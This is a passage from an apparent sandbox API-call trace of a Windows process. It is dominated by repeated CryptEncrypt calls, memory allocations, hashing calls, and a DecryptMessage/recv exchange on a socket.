(_Size=0x1fd) returned 0x3691478 [0196.942] free (_Block=0x0) [0196.942] free (_Block=0x3691270) [0196.943] free (_Block=0x606108) [0196.943] malloc (_Size=0x1fd) returned 0x3691270 [0196.943] free (_Block=0x0) [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.943] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.944] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.945] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.946] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.947] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.947] malloc (_Size=0x1fd) returned 0x606108 [0196.947] free (_Block=0x0) [0196.947] free (_Block=0x3691478) [0196.947] free (_Block=0x3691270) [0196.947] malloc (_Size=0x1fd) returned 0x3691270 [0196.947] free (_Block=0x0) [0196.948] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.948] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.948] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.948] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.948] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.948] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.949] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.949] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.949] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.949] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.949] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.949] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.950] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.951] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.951] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.951] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.951] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.951] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.951] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.952] malloc (_Size=0x1fd) returned 0x3691478 [0196.953] free (_Block=0x0) [0196.953] free (_Block=0x606108) [0196.953] malloc (_Size=0x1fd) returned 0x606108 [0196.953] free (_Block=0x0) [0196.953] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0196.953] CryptHashData (hHash=0x432cb8, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0196.954] malloc (_Size=0x14) returned 0x3f65440 [0196.954] free (_Block=0x0) [0196.954] CryptGetHashParam (in: hHash=0x432cb8, dwParam=0x2, pbData=0x3f65440, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65440, pdwDataLen=0x339faec) returned 1 [0196.954] CryptHashData (hHash=0x432c78, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0196.954] free (_Block=0x3f65440) [0196.954] CryptDestroyHash (hHash=0x432cb8) returned 1 [0196.954] free (_Block=0x606108) [0196.955] free (_Block=0x3691270) [0196.955] malloc (_Size=0x1fd) returned 0x3691270 [0196.955] free (_Block=0x0) [0196.955] malloc (_Size=0xf5) returned 0x3df0550 [0196.955] free (_Block=0x0) [0196.955] malloc (_Size=0xf5) returned 0x606108 [0196.955] free (_Block=0x0) [0196.956] free (_Block=0x0) [0196.956] free (_Block=0x3df0550) [0196.956] malloc (_Size=0x100) returned 0x3df0550 [0196.956] free (_Block=0x0) [0196.957] free (_Block=0x606108) [0196.957] free (_Block=0x3691270) [0196.957] free (_Block=0x3691478) [0196.957] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0196.958] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0197.273] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0197.274] malloc (_Size=0x1fd) returned 0x606108 [0197.274] free (_Block=0x0) [0197.274] malloc (_Size=0x1fd) returned 0x3691270 [0197.274] free (_Block=0x0) [0197.274] free (_Block=0x0) [0197.274] free (_Block=0x606108) [0197.274] malloc (_Size=0x1fd) returned 0x606108 [0197.274] free (_Block=0x0) [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.274] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.275] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] malloc (_Size=0x1fd) returned 0x3691478 [0197.276] free (_Block=0x0) [0197.276] free (_Block=0x3691270) [0197.276] free (_Block=0x606108) [0197.276] malloc (_Size=0x1fd) returned 0x3691270 [0197.276] free (_Block=0x0) [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0197.276] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, 